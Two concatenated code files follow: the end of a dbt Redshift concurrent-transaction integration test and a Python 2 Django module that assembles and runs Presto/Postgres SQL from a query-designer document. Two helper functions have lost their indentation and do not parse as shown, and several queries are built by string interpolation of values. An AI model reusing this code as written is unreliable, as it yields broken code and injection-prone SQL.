            # NOTE(review): both branches store the same value — presumably
            # the 'concurrent transaction' case was meant to be handled
            # differently; confirm intent.
            if 'concurrent transaction' in str(e):
                self.query_state[rel] = 'error: {}'.format(e)
            else:
                self.query_state[rel] = 'error: {}'.format(e)
    def async_select(self, rel, sleep=10):
        # Run the select statement in a thread. When the query returns, the global
        # query_state will be update with a state of good/bad/error, and the associated
        # error will be reported if one was raised.
        schema = self.unique_schema()
        query = '''
-- async_select: {rel}
select {schema}.f_sleep({sleep}) from {schema}.{rel}
'''.format(
            schema=schema,
            sleep=sleep,
            rel=rel)
        thread = threading.Thread(target=lambda: self.run_select_and_check(rel, query))
        thread.start()
        return thread
    def run_test(self):
        self.use_profile("redshift")
        # First run the project to make sure the models exist
        results = self.run_dbt(args=['run'])
        self.assertEqual(len(results), 2)
        # Execute long-running queries in threads
        t1 = self.async_select('view_model', 10)
        t2 = self.async_select('model_1', 5)
        # While the queries are executing, re-run the project
        res = self.run_dbt(args=['run', '--threads', '8'])
        self.assertEqual(len(res), 2)
        # Finally, wait for these threads to finish
        t1.join()
        t2.join()
        self.assertTrue(len(res) > 0)
        # If the query succeeded, the global query_state should be 'good'
        self.assertEqual(self.query_state['view_model'], 'good')
        self.assertEqual(self.query_state['model_1'], 'good')
class TableTestConcurrentTransaction(BaseTestConcurrentTransaction):
    """Concurrent-transaction scenario with table-materialized models."""
    @property
    def models(self):
        return "test/integration/032_concurrent_transaction_test/models-table"
    @attr(type="redshift")
    def test__redshift__concurrent_transaction_table(self):
        self.reset()
        self.run_test()
class ViewTestConcurrentTransaction(BaseTestConcurrentTransaction):
    """Concurrent-transaction scenario with view-materialized models."""
    @property
    def models(self):
        return "test/integration/032_concurrent_transaction_test/models-view"
    @attr(type="redshift")
    def test__redshift__concurrent_transaction_view(self):
        self.reset()
        self.run_test()
class IncrementalTestConcurrentTransaction(BaseTestConcurrentTransaction):
    """Concurrent-transaction scenario with incrementally-materialized models."""
    @property
    def models(self):
        return "test/integration/032_concurrent_transaction_test/models-incremental"
    @attr(type="redshift")
    def test__redshift__concurrent_transaction_incremental(self):
        self.reset()
        self.run_test()
|
presto.py | import re
from collections import OrderedDict
import prestodb
from query_designer.models import Query
import time
from threading import Thread
import sys
from django.db import connections, ProgrammingError
from django.conf import settings
from aggregator.models import Variable, Dimension
from .utils import GRANULARITY_MIN_PAGES, ResultEncoder
def process(self, dimension_values='', variable='', only_headers=False, commit=True, execute=False, raw_query=False, from_visualizer=False):
    """Build (and optionally execute) the Presto/Postgres query described by
    self.document, returning {'results': ..., 'headers': {...}}.

    With only_headers=True the query is built but not run; raw_query=True adds
    the generated SQL to the response; from_visualizer=True swaps round() for
    MIN() in the select list (map visualisations).
    """
    dimension_values = preprocess_dimension_values(dimension_values)
    selects = OrderedDict()
    headers = []
    header_sql_types = []
    columns = []
    groups = []
    prejoin_groups = []
    # Walk self.document['from'] and fill the accumulators above.
    c_name, v_obj, data_table_names, groups = preprocess_document(columns, groups, prejoin_groups,
                                                                  header_sql_types, headers, selects, self)
    # import pdb
    # pdb.set_trace()
    prejoin_name = None
    if len(self.document['from']) > 1:
        prejoin_name = extract_prejoin_name(self.document['from'])
    # Multi-dataset aggregate queries go through the precomputed prejoin table.
    if is_query_with_aggregate(self.document['from']) and prejoin_name is not None:
        limit, query, subquery_cnt = build_prejoin_query(prejoin_name, columns,
                                                         prejoin_groups, self)
    else:
        limit, query, subquery_cnt = build_query(c_name, columns, groups, selects, self)
    # if for map visualisation, do not perform round on select, but choose min
    print 'trying to remove round'
    if from_visualizer:
        query = remove_round_from_select(query)
        print 'removed round'
    cursor = choose_db_cursor(v_obj)
    if not only_headers:
        # execute query & return results
        t1 = time.time()
        pages = {
            'current': 1,
            'total': 1
        }
        # NOTE(review): counting is disabled — _count is a stub and the
        # commented thread below never runs, so self.count stays None.
        def _count():
            pass
            # cursor.execute(subquery_cnt)
            # self.count = cursor.fetchone()[0]
        self.count = None
        count_failed = False
        # t = Thread(target=_count, args=[])
        # t.start()
        # t.join(timeout=5)
        # if self.count is None:
        #     count_failed = True
        #     self.count = 10000000
        #
        # if limit is not None:
        #     pages['total'] = (self.count - 1) / limit + 1
        # apply granularity
        # NOTE(review): with self.count == None this comparison is always
        # False under Python 2, so the granularity wrapper never applies.
        if self.count >= GRANULARITY_MIN_PAGES and (not count_failed):
            try:
                granularity = int(self.document.get('granularity', 0))
            except ValueError:
                granularity = 0
            if granularity > 1:
                # Keep every granularity-th row via a row_number() wrapper.
                query = """
SELECT %s FROM (
SELECT row_number() OVER () AS row_id, * FROM (%s) AS GQ
) AS GQ_C
WHERE (row_id %% %d = 0)
""" % (','.join([c[1] for c in columns]), query, granularity)
        print "Executed query:"
        print query
        results = []
        if execute:
            cursor.execute(query)
            try:
                all_rows = cursor.fetchall()
            except Exception, e:
                # Map Presto's memory-limit error onto a stable sentinel.
                if e.message.find('exceeded') >= 0:
                    print 'MAX MEMORY EXCEEDED'
                    raise Exception('max_memory_exceeded')
                else:
                    print e.message
                    print 'other error'
                    raise Exception('error')
            print "First rows"
            print all_rows[:3]
            print header_sql_types
            results = all_rows
    # include dimension values if requested
    for d_name in dimension_values:
        hdx, header = [hi for hi in enumerate(headers) if hi[1]['name'] == d_name][0]
        d = Dimension.objects.get(pk=selects[d_name]['column'].split('_')[-1])
        if not d.non_filterable:
            header['values'] = d.values
    # include variable ranges if requested
    if variable:
        vdx, v = [vi for vi in enumerate(headers) if vi[1]['name'] == variable][0]
        v['distribution'] = Variable.objects.get(pk=selects[variable]['table'].split('_')[-1]).distribution
    if not only_headers:
        # monitor query duration
        q_time = (time.time() - t1) * 1000
    if not only_headers:
        response = {
            'results': results,
            'headers': {
                'runtime_msec': q_time,
                # 'pages': pages,
            }
        }
    else:
        response = {'headers': {}}
    response['headers']['columns'] = headers
    if raw_query:
        response['raw_query'] = query
    # store headers
    self.headers = ResultEncoder(mode='postgres').encode(headers)
    if self.pk and commit:
        self.save()
    return response
def preprocess_dimension_values(dimension_values):
    """Split a comma-separated dimension string into a list.

    Empty/None input yields an empty list.
    """
    return dimension_values.split(',') if dimension_values else []
def preprocess_document(columns, groups, prejoin_groups, header_sql_types, headers, selects, self):
    """Walk self.document['from'] and populate the query-builder accumulators.

    Mutates columns, groups, prejoin_groups, header_sql_types, headers and
    selects in place; returns (last c_name_with_agg, last Variable object,
    data table names, deduplicated groups).
    """
    data_table_names = []
    for _from in self.document['from']:
        v_obj = Variable.objects.get(pk=_from['type'])
        for s in _from['select']:
            # A select entry is either a dimension (type = Dimension pk) or
            # the variable's value column (type == 'VALUE').
            if s['type'] != 'VALUE':
                human_column_name = Dimension.objects.get(pk=s['type']).title
                print human_column_name
                dimension = Dimension.objects.get(pk=s['type'])
                column_name = dimension.data_column_name
                column_unit = dimension.unit
                column_axis = dimension.axis
                column_step = dimension.step
                sql_type = dimension.sql_type
            else:
                human_column_name = Variable.objects.get(pk=_from['type']).title
                print human_column_name
                # Presto-backed datasets store the value under the variable
                # name; others use a generic 'value' column.
                if v_obj.dataset.stored_at == 'UBITECH_PRESTO':
                    column_name = v_obj.name
                else:
                    column_name = 'value'
                column_unit = v_obj.unit
                column_axis = None
                column_step = None
                sql_type = 'double precision'
            selects[s['name']] = {'column': column_name, 'table': v_obj.data_table_name}
            _from['name'] = v_obj.data_table_name
            # if 'joined' not in s:
            c_name = '%s.%s' % (_from['name'], selects[s['name']]['column'])
            # Wrap the column in its aggregate and build a human-readable
            # header title for the round*/date_trunc_* pseudo-aggregates.
            if s.get('aggregate', '') != '':
                c_name_with_agg = '%s(%s)' % (s.get('aggregate'), c_name)
                if str(s.get('aggregate')).startswith('date_trunc'):
                    human_column_name_with_agg = '%s(%s)' % (str(s.get('aggregate')).split('date_trunc_')[1], human_column_name)
                elif str(s.get('aggregate')).startswith('round0'):
                    human_column_name_with_agg = '%s\n(%s)' % (human_column_name, 'resolution 1 deg')
                elif str(s.get('aggregate')).startswith('round1'):
                    human_column_name_with_agg = '%s\n(%s)' % (human_column_name, 'resolution 0.1 deg')
                elif str(s.get('aggregate')).startswith('round2'):
                    human_column_name_with_agg = '%s\n(%s)' % (human_column_name, 'resolution 0.01 deg')
                else:
                    human_column_name_with_agg = '%s(%s)' % (str(s.get('aggregate')), human_column_name)
            else:
                c_name_with_agg = c_name
                human_column_name_with_agg = human_column_name
            # Excluded selects contribute to grouping but not to the output.
            if not s.get('exclude', False):
                header_sql_types.append(sql_type)
                headers.append({
                    'title': human_column_name_with_agg.lower().title(),
                    'name': s['name'],
                    'unit': column_unit,
                    'step': column_step,
                    'quote': '' if sql_type.startswith('numeric') or sql_type.startswith('double') else "'",
                    'isVariable': s['type'] == 'VALUE',
                    'axis': column_axis,
                })
                # add fields to select clause
                columns.append((c_name_with_agg, '%s' % s['name'], '%s' % s['title'], s.get('aggregate')))
            # add fields to grouping
            if s.get('groupBy', False):
                if str(s.get('aggregate', '')).startswith('round') or str(s.get('aggregate', '')).startswith('date'):
                    groups.append(c_name_with_agg)
                    prejoin_groups.append('%s(%s)' % (s.get('aggregate'), selects[s['name']]['column']))
                else:
                    groups.append(c_name)
                    prejoin_groups.append('%s' % (selects[s['name']]['column']))
        data_table_names.append(v_obj.data_table_name)
    groups = list(set(groups))
    # NOTE(review): c_name_with_agg / v_obj are whatever the *last* select
    # produced; an empty document would leave them undefined here.
    return c_name_with_agg, v_obj, data_table_names, groups
def is_query_with_aggregate(from_list):
    """Return True unless some VALUE column is selected without an aggregate.

    A single non-aggregated VALUE select makes the whole query non-aggregate.
    """
    for entry in from_list:
        for sel in entry['select']:
            if sel.get('type') == 'VALUE' and sel['aggregate'] == '':
                return False
    return True
def remove_round_from_select(q):
    """Swap round(...) for MIN(...) in the select list of the first subquery.

    Used for map visualisations, where values must not be rounded on select.
    Strips the ", 0"/", 1"/", 2" precision arguments left behind by round().
    """
    before_select = q.split('(SELECT')[0]
    after_select = q.split('(SELECT')[1]
    select_clause = (after_select.split('FROM')[0]
                     .replace('round(', 'MIN(')
                     .replace(', 0', '')
                     .replace(', 1', '')
                     .replace(', 2', ''))
    return before_select + '(SELECT' + select_clause + 'FROM' + after_select.split('FROM')[1]
def extract_prejoin_name(from_list):
    """Return the name of the pre-joined view when the FROM entries span two
    datasets; None when everything comes from a single dataset."""
    dataset_ids = list({
        Variable.objects.get(pk=int(entry['type'])).dataset.id
        for entry in from_list
    })
    if len(dataset_ids) > 1:
        return extract_prejoin_name_for_datasets(dataset_ids[0], dataset_ids[1])
    return None
def build_prejoin_query(prejoin_name, columns, prejoin_groups, self):
    # Assemble the SQL run against a pre-joined view: SELECT/FROM/WHERE/
    # GROUP BY/ORDER BY wrapped in a subquery, plus a COUNT(*) companion query
    # used for paging. Returns (limit, query, count_query).
    select_clause = build_prejoin_select_clause(columns)
    from_clause = 'FROM ' + prejoin_name + '\n'
    where_clause = build_prejoin_where_clause(self, prejoin_name)
    group_clause = build_group_by_clause(prejoin_groups)
    order_by_clause = build_order_by_clause(self)
    limit, limit_clause = build_limit_clause(self)
    subquery = 'SELECT * FROM (' + select_clause + from_clause + where_clause + group_clause + order_by_clause + ') AS SQ1\n'
    q = subquery + limit_clause
    subquery_cnt = 'SELECT COUNT(*) FROM (' + q + ') AS SQ1\n'
    print 'Initial Query:'
    print subquery
    # Expand the roundN()/date_trunc_X() placeholder pseudo-functions into
    # real SQL before execution.
    q, subquery, subquery_cnt = fix_round(q, subquery, subquery_cnt)
    q = fix_date_trunc(q, subquery, subquery_cnt)
    return limit, q, subquery_cnt
def build_query(c_name, columns, groups, selects, self):
    # Assemble the multi-dataset SQL (SELECT/FROM/JOIN/WHERE/GROUP BY/ORDER BY)
    # wrapped in a subquery, plus a COUNT(*) companion query for paging.
    # Returns (limit, query, count_query).
    select_clause = build_select_clause(columns)
    from_clause = build_from_clause(selects)
    all_joins_for_check, join_clause, needs_join_reorder = build_join_clause(c_name, selects, self)
    if not is_same_range_joins(all_joins_for_check):
        raise ValueError("Datasets have columns in common but actually nothing to join (ranges with nothing in common)")
    where_clause = build_where_clause(self)
    group_clause = build_group_by_clause(groups)
    order_by_clause = build_order_by_clause(self)
    limit, limit_clause = build_limit_clause(self)
    # Swap the FROM table with the JOINed table so the larger dataset leads
    # (flag computed by build_join_clause from row counts).
    if needs_join_reorder:
        table1 = from_clause.split('FROM ')[1].strip()
        table2 = join_clause.split('JOIN ')[1].split('ON')[0].strip()
        from_clause = from_clause.replace(table1, table2)
        join_clause = join_clause.split('ON')[0].replace(table2, table1) + ' ON ' + join_clause.split('ON')[1]
    # organize into subquery
    subquery = 'SELECT * FROM (' + select_clause + from_clause + join_clause + where_clause + group_clause + order_by_clause + ') AS SQ1\n'
    q = subquery + limit_clause
    subquery_cnt = 'SELECT COUNT(*) FROM (' + q + ') AS SQ1\n'
    print 'Initial Query:'
    print subquery
    # Expand roundN()/date_trunc_X() placeholder pseudo-functions.
    q, subquery, subquery_cnt = fix_round(q, subquery, subquery_cnt)
    q = fix_date_trunc(q, subquery, subquery_cnt)
    return limit, q, subquery_cnt
def choose_db_cursor(v_obj):
    # Open a cursor on Presto when the variable's dataset is stored there,
    # otherwise fall back to Django's default database connection.
    if v_obj.dataset.stored_at == 'UBITECH_PRESTO':
        presto_credentials = settings.DATABASES['UBITECH_PRESTO']
        conn = prestodb.dbapi.connect(
            host=presto_credentials['HOST'],
            port=presto_credentials['PORT'],
            user=presto_credentials['USER'],
            catalog=presto_credentials['CATALOG'],
            schema=presto_credentials['SCHEMA'],
        )
        cursor = conn.cursor()
    else:
        cursor = connections['default'].cursor()
    return cursor
def extract_prejoin_name_for_datasets(dataset_id1, dataset_id2):
query = """SELECT view_name
FROM aggregator_joinofdatasets
WHERE (dataset_first_id =%s AND dataset_second_id = %s) OR
(dataset_first_id = %s AND dataset_second_id = %s) """ \
% (dataset_id1, dataset_id2, dataset_id2, dataset_id1)
cursor = connections['default'].cursor()
try:
cursor.execute(query)
except ProgrammingError as e:
print "query execution failed due to: ", e
return None
res = cursor.fetchone()
if res is not None:
return res[0]
return None
def translate_percentiles_if_needed(select_clause):
    """Rewrite PERCENTILE_CONT_* pseudo-functions; other clauses pass through."""
    if 'PERCENTILE_CONT' in select_clause:
        return translate_percentiles(select_clause)
    return select_clause
def translate_percentiles(select_clause):
    """Translate 'PERCENTILE_CONT_<p>(col)' into 'APPROX_PERCENTILE(col, p/100)'."""
    head, _, tail = select_clause.partition('(')
    # head looks like PERCENTILE_CONT_<p>; the third underscore-part is <p>.
    fraction = int(head.split('_')[2]) / 100.0
    column = tail.split(')')[0]
    return 'APPROX_PERCENTILE' + '(' + column + ', ' + str(fraction) + ')'
def build_select_clause(columns):
    """Render 'SELECT expr AS alias,...' from (expr, alias, ...) tuples,
    translating percentile pseudo-functions on the way."""
    rendered = []
    for col in columns:
        rendered.append('%s AS %s' % (translate_percentiles_if_needed(col[0]), col[1]))
    return 'SELECT ' + ','.join(rendered) + '\n'
def build_prejoin_select_clause(columns):
    """Like build_select_clause, but strips 'table.' qualifiers inside
    aggregate calls (the pre-joined view has unqualified columns)."""
    import re
    rendered = [
        '%s AS %s' % (re.sub("[(].*[.]", "(", col[0]), col[1])
        for col in columns
    ]
    return 'SELECT ' + ','.join(rendered) + '\n'
def build_from_clause(selects):
    """Render the FROM clause using the table of an arbitrary select entry
    (all entries are expected to share a table at this point).

    Portability fix: the original used selects.keys()[0], which is
    Python-2-only (dict views are not indexable on Python 3);
    next(iter(...)) behaves identically on both versions.
    """
    first_key = next(iter(selects))
    return 'FROM %s \n' % selects[first_key]['table']
def build_join_clause(c_name, selects, self):
    # Build JOIN clauses linking each secondary FROM entry back to the first
    # one via its 'joined' column mappings; also collect the joined column
    # pairs so their value ranges can be validated later.
    # Returns (all_joins_for_check, join_clause, needs_join_reorder).
    join_clause = ''
    all_joins_for_check = []
    tables_in_query = set()
    tables_in_query.add(selects[self.document['from'][0]['select'][0]['name']]['table'])
    join_from_index = -1
    needs_join_reorder = False
    for idx, _from in enumerate(self.document['from'][1:], 1):
        joins = []
        joins_for_check = []
        for s in _from['select']:
            if 'joined' in s:
                # A latitude column implies a paired longitude join; a bare
                # longitude is skipped because the latitude case covered it.
                if s['name'].endswith('location_latitude'):
                    js = [
                        (s['name'], s['joined'] + '_latitude'),
                        (s['name'].replace('_latitude', '_longitude'), s['joined'] + '_longitude'),
                    ]
                elif s['name'].endswith('location_longitude'):
                    js = []
                else:
                    js = [(s['name'], s['joined'])]
                for j in js:
                    joins_for_check.append(((_from['type'], selects[j[0]]['column']),
                                            (self.document['from'][0]['type'], selects[j[1]]['column'])))
                    # Aggregated joins compare f(a)=f(b) instead of a=b.
                    if s.get('aggregate', '') != '':
                        c_name = '%s(%s)' % (s.get('aggregate'), c_name)
                        joins.append('%s(%s.%s)=%s(%s.%s)' %
                                     (s.get('aggregate'),
                                      _from['name'],
                                      selects[j[0]]['column'],
                                      s.get('aggregate'),
                                      self.document['from'][0]['name'],
                                      selects[j[1]]['column']))
                    else:
                        joins.append('%s.%s=%s.%s' %
                                     (_from['name'],
                                      selects[j[0]]['column'],
                                      self.document['from'][0]['name'],
                                      selects[j[1]]['column']))
        print "LOOK FOR JOIN"
        print selects
        print _from['name']
        print tables_in_query
        # Only emit a JOIN the first time a table appears in the query.
        if selects[_from['select'][0]['name']]['table'] not in tables_in_query:
            tables_in_query.add(selects[_from['select'][0]['name']]['table'])
            print "WE HAVE JOIN"
            join_from_index = idx
            join_clause += 'JOIN %s ON %s\n' % \
                (selects[_from['select'][0]['name']]['table'],
                 ' AND '.join(joins))
        # A JOIN whose ON list is empty means no common columns were found.
        if join_clause.replace(" ", "").replace("\n", "").replace(",", "").endswith("ON"):
            raise ValueError("No common columns for all the datasets. They cannot be combined.")
        all_joins_for_check.append(joins_for_check)
    if join_clause != '':
        print 'join_clause is not empty'
        # Request a reorder when the joined dataset is larger than the lead one.
        dataset1 = Variable.objects.get(pk=int(self.document['from'][0]['type'])).dataset
        dataset2 = Variable.objects.get(pk=int(self.document['from'][join_from_index]['type'])).dataset
        print long(dataset1.number_of_rows), long(dataset2.number_of_rows)
        if long(dataset2.number_of_rows) > long(dataset1.number_of_rows):
            print 'needs reorder'
            needs_join_reorder = True
        print "Joins to check"
        print all_joins_for_check
        # Reject joins whose dimension ranges cannot overlap.
        if not is_same_range_joins(all_joins_for_check):
            print "Datasets have columns in common but actually nothing to join (ranges with nothing in common)"
            raise ValueError("Datasets do not match both in space and time. They cannot be combined.")
        print "Query Continues"
    # where
    return all_joins_for_check, join_clause, needs_join_reorder
def build_where_clause(self):
    """Build the WHERE clause: optional user filters AND an OR-chain of
    '<table>.<variable> is not NULL' guards, one per FROM entry."""
    filters = self.document.get('filters', '')
    user_filters = self.process_filters(filters, 'presto', use_table_names=True) if filters else ''
    null_guards = []
    for entry in self.document['from']:
        variable = Variable.objects.get(pk=int(entry['type']))
        null_guards.append(variable.dataset.table_name + '.' + variable.name + ' is not NULL')
    extra_filters = ' OR '.join(null_guards)
    if user_filters:
        return 'WHERE ' + user_filters + ' AND (' + extra_filters + ') \n'
    return 'WHERE ' + extra_filters + ' \n'
def process_prejoin_filters(filters_json, self, view_name):
    # Recursively rewrite a filter expression tree (dicts with 'a', 'op', 'b')
    # into SQL text over the pre-joined view; leaves that name columns are
    # resolved, other literals are returned untouched.
    if type(filters_json) in [int, float]:
        try:
            filters = process_prejoin_leaf_filters(filters_json, self, view_name)
        except:
            # Not a column token -- keep the numeric literal as-is.
            return filters_json
        return filters
    if type(filters_json) in [str, unicode]:
        try:
            filters = process_prejoin_leaf_filters(filters_json, self, view_name)
        except:
            return filters_json
        return "%s" % filters
    # Inner node: render both sides, parenthesizing non-leaf subtrees.
    _a = process_prejoin_filters(filters_json['a'], self, view_name)
    _b = process_prejoin_filters(filters_json['b'], self, view_name)
    result = '%s %s %s' % \
        (('(%s)' % _a) if type(_a) not in [str, unicode, int, float] else _a,
         Query.operator_to_str(filters_json['op']),
         ('(%s)' % _b) if type(_b) not in [str, unicode, int, float] else _b)
    return result
def process_prejoin_leaf_filters(filters, self, view_name):
    # Map a leaf token of the form 'i<from_index>_<name>' onto the matching
    # column of the pre-joined view ('<view_name>.<column>').
    col_name = ''
    from_order = int(filters[filters.find('i') + 1:filters.find('_')])
    if from_order >= 0:
        for x in self.document['from'][from_order]['select']:
            if x['name'] == filters:
                if x['type'] != 'VALUE':
                    # Dimension selects carry the dimension's pk in 'type'.
                    col_name = Dimension.objects.get(pk=x['type']).data_column_name
                else:
                    v_obj = Variable.objects.get(pk=int(self.document['from'][from_order]['type']))
                    # Presto datasets expose the variable name; others use a
                    # generic 'value' column.
                    if v_obj.dataset.stored_at == 'UBITECH_PRESTO':
                        col_name = v_obj.name
                    else:
                        col_name = 'value'
                filters = view_name + '.' + col_name
    return filters
def build_prejoin_where_clause(self, view_name):
    """WHERE clause for the pre-joined view: optional user filters AND an
    OR-chain of '<variable> is not NULL' guards, one per FROM entry."""
    filters = self.document.get('filters', '')
    user_filters = self.process_filters(filters, mode='presto', use_table_names=False) if filters else ''
    null_guards = []
    for entry in self.document['from']:
        variable = Variable.objects.get(pk=int(entry['type']))
        null_guards.append(variable.name + ' is not NULL')
    extra_filters = ' OR '.join(null_guards)
    if user_filters:
        return 'WHERE ' + user_filters + ' AND (' + extra_filters + ') \n'
    return 'WHERE ' + extra_filters + ' \n'
def build_group_by_clause(groups):
    """Render 'GROUP BY a,b\\n', or '' when there is nothing to group by."""
    if not groups:
        return ''
    return 'GROUP BY %s\n' % ','.join(groups)
def build_order_by_clause(self):
    """Render 'ORDER BY name dir,...' from the document's orderings, or ''."""
    orderings = self.document.get('orderings', [])
    if not orderings:
        return ''
    terms = ['%s %s' % (o['name'], o['type']) for o in orderings]
    return 'ORDER BY %s\n' % ','.join(terms)
def build_limit_clause(self):
    """Return (limit, 'LIMIT n\\n'); (None, '') when the document sets no limit."""
    if self.document.get('limit'):
        limit = int(self.document['limit'])
        return limit, 'LIMIT %d\n' % limit
    return None, ''
def fix_date_trunc(q, subquery, subquery_cnt):
    # Rewrite 'date_trunc_<unit>(col)' placeholders into standard SQL
    # "date_trunc('<unit>', col)" across all three query strings.
    # NOTE(review): only the first unit found in `subquery` is handled per
    # call, and column names are interpolated into regexes unescaped --
    # names containing regex metacharacters would break; confirm inputs.
    if len(re.findall(r'date_trunc_(.*?)', subquery)) > 0:
        print 'Trying to fix date_trunc'
        time_trunc = str(subquery.split('date_trunc_')[1].split('(')[0])
        # print
        names = re.findall(r"date_trunc_" + time_trunc + "\((.*?)\)", subquery)
        for name in names:
            subquery = re.sub(r"date_trunc_" + time_trunc + "\((" + name + ")\)",
                              "date_trunc('" + time_trunc + "', " + name + ")", subquery)
        # print subquery
        names = re.findall(r"date_trunc_" + time_trunc + "\((.*?)\)", subquery_cnt)
        for name in names:
            subquery_cnt = re.sub(r"date_trunc_" + time_trunc + "\((" + name + ")\)",
                                  "date_trunc('" + time_trunc + "', " + name + ")", subquery_cnt)
        # print subquery_cnt
        names = re.findall(r"date_trunc_" + time_trunc + "\((.*?)\)", q)
        for name in names:
            q = re.sub(r"date_trunc_" + time_trunc + "\((" + name + ")\)",
                       "date_trunc('" + time_trunc + "', " + name + ")", q)
        # print q
    print 'looking for COUNTdistinctdate_trunc'
    # Re-expand the collapsed COUNT(DISTINCT date_trunc(...)) marker.
    if str(q).find('COUNTdistinctdate_trunc') > -1:
        q = q.split('COUNTdistinctdate_trunc')[0] + 'COUNT(DISTINCT date_trunc' + q.split('COUNTdistinctdate_trunc')[1].split(')', 1)[0] + '))' + q.split('COUNTdistinctdate_trunc')[1].split(')', 1)[1]
    print 'done COUNTdistinctdate_trunc'
    return q
def fix_round(q, subquery, subquery_cnt):
    # Rewrite 'round<d>(col)' placeholders into standard SQL 'round(col, d)'
    # across all three query strings, one precision digit at a time.
    # NOTE(review): column names are interpolated into regexes unescaped --
    # names containing regex metacharacters would break; confirm inputs.
    if len(re.findall(r'round\d', subquery)) > 0:
        print 'Trying to fix round'
        # round_num = str(subquery.split('round')[1][0])
        for occurance in set(re.findall(r'round\d', subquery)):
            round_num = str(occurance)[-1]
            print round_num
            # names = re.findall(r"round" + round_num + "\((.*?)\)", subquery)
            # print
            names = re.findall(r"round" + round_num + "\((.*?)\)", subquery)
            for name in names:
                subquery = re.sub(r"round" + round_num + "\((" + name + ")\)",
                                  "round(" + name + ", " + round_num + ")", subquery)
            # print subquery
            names = re.findall(r"round" + round_num + "\((.*?)\)", subquery_cnt)
            for name in names:
                subquery_cnt = re.sub(r"round" + round_num + "\((" + name + ")\)",
                                      "round(" + name + ", " + round_num + ")", subquery_cnt)
            # print subquery_cnt
            names = re.findall(r"round" + round_num + "\((.*?)\)", q)
            for name in names:
                q = re.sub(r"round" + round_num + "\((" + name + ")\)",
                           "round(" + name + ", " + round_num + ")", q)
            # print q
    return q, subquery, subquery_cnt
def extract_variable_ids_from_doc(from_list):
    """Return the variable ids ('type') of the first two FROM entries
    (callers use this only for two-dataset queries)."""
    ids = [entry['type'] for entry in from_list]
    return ids[0], ids[1]
def extract_dataset_id_from_varible_ids(variable_id):
query = """SELECT dataset_id
FROM aggregator_variable
WHERE id =%s """ % variable_id
cursor = connections['default'].cursor()
try:
cursor.execute(query)
except ProgrammingError as e:
print "query execution failed due to: ", e
return None
res = cursor.fetchone()
return res[0]
def is_same_range_joins(join_list):
    # A multi-dataset join is feasible only if, along every chain of joined
    # dimensions, the stored [min, max] ranges actually overlap.
    join_chain_list = create_join_chain_list_from_joins(join_list)
    print 'join_chain_list'
    print join_chain_list
    min_max_list = calculate_range_for_every_join_chain(join_chain_list)
    print 'min_max_list'
    print min_max_list
    return is_valid_range_all_chains(min_max_list)
def create_join_chain_list_from_joins(join_list):
    # Group the flat list of pairwise joins into chains of transitively-joined
    # dimensions; each chain is a list of (variable_id, column) endpoints.
    all_joins_list, chained_dimensions, join_chain_list, list_accessed_counter = init_variables(join_list)
    for join in all_joins_list:
        # Start a new chain only when at least one endpoint is still unseen.
        if not (chained_dimensions.__contains__(join[0]) and chained_dimensions.__contains__(join[1])):
            chain_list = update_chain_join_list(join)
            update_chained_dimensions(chained_dimensions, join)
            # Pull any later join that touches this chain into it.
            add_joins_to_chain_if_exist(all_joins_list, chain_list, chained_dimensions, list_accessed_counter)
            join_chain_list.append(chain_list)
        # Tracks how far into all_joins_list we have advanced.
        list_accessed_counter += 1
    return join_chain_list
def calculate_range_for_every_join_chain(join_chain_list):
    """For each chain, collect the (min, max) bounds of every dimension in it."""
    return [
        [get_min_max_dimension(dim) for dim in join_chain]
        for join_chain in join_chain_list
    ]
def is_valid_range_all_chains(min_max_chain_list):
    """True when every join chain has a non-empty common range."""
    return all(is_valid_range_for_chain(chain) for chain in min_max_chain_list)
def init_variables(join_list):
    """Set up the working state for chain construction:
    (flattened joins, seen dimensions, chains, scan cursor)."""
    all_joins_list = extract_all_joins_from_join_list(join_list)
    return all_joins_list, [], [], 0
def update_chain_join_list(join):
    """Start a new chain seeded with both endpoints of the join."""
    return list(join[:2])
def update_chained_dimensions(chained_dimensions, join):
    """Record both endpoints of the join as already chained (mutates in place)."""
    chained_dimensions.extend([join[0], join[1]])
def add_joins_to_chain_if_exist(all_joins_list, chain_list, chained_dimensions, list_accessed_counter):
    """Fold every not-yet-visited join that touches the chain into it."""
    remaining = all_joins_list[list_accessed_counter:]
    for candidate in remaining:
        add_join_if_valid(chain_list, chained_dimensions, candidate)
def get_min_max_dimension(dim):
    # dim is a (variable_id, dimension_name) pair; return the dimension's
    # stored (min, max) bounds, or an effectively unbounded range when they
    # are unknown or the lookup fails.
    # (Dead code kept for reference: bounds used to come from raw SQL.)
    # cursor = connections['default'].cursor()
    # min_max_dim_query = build_min_max_dimension_query(dim)
    # try:
    #     cursor.execute(min_max_dim_query)
    # except ProgrammingError as e:
    #     print "query execution failed due to: ", e
    #     return None
    # res = cursor.fetchone()
    res = None
    try:
        min = Variable.objects.get(pk=int(dim[0])).dimensions.get(name=dim[1]).min
        max = Variable.objects.get(pk=int(dim[0])).dimensions.get(name=dim[1]).max
        if min is not None and max is not None:
            res = (min, max)
    except:
        # Missing variable/dimension: fall through to the unbounded default.
        pass
    if res is not None:
        return res[0], res[1]
    else:
        # Python 2 only: sys.maxint does not exist on Python 3.
        return (-1 * sys.maxint), sys.maxint
def build_min_max_dimension_query(dim):
    # Render the (currently unused -- see get_min_max_dimension) SQL that
    # fetched a dimension's min/max for a (variable_id, title) pair.
    # NOTE(review): %-interpolation of dim[1] into the SQL string; if this
    # query is ever revived, switch to bound parameters.
    min_max_dim_query = """
    SELECT
    min,
    max
    FROM aggregator_dimension d
    INNER JOIN aggregator_variable v
    ON d.variable_id = v.id
    WHERE d.title = '%s' AND variable_id = %s
    """ % (dim[1], dim[0])
    return min_max_dim_query
def is_valid_range_for_chain(chain):
    # Tighten the intersection [max_of_mins, min_of_maxes] over every
    # dimension's (min, max) pair in the chain; the chain is joinable iff the
    # intersection stays non-empty.
    max_of_mins, min_of_maxes = initialize_minofmaxes_and_maxofmins(chain)
    if min_of_maxes is None or max_of_mins is None:
        # No usable bounds anywhere -- nothing to validate.
        return True
    for dim in chain:
        if dim[0] is not None and dim[0] > max_of_mins:
            max_of_mins = dim[0]
        if dim[1] is not None and dim[1] < min_of_maxes:
            min_of_maxes = dim[1]
    if min_of_maxes < max_of_mins:
        return False
    return True
def add_join_if_valid(chain_list, chained_dimensions, join2):
    """Attach join2's unseen endpoint to the chain when exactly one of its
    endpoints is already in the chain (mutates both lists in place)."""
    first_in = join2[0] in chain_list
    second_in = join2[1] in chain_list
    if first_in == second_in:
        return  # either disjoint from the chain or already fully contained
    newcomer = join2[1] if first_in else join2[0]
    chain_list.append(newcomer)
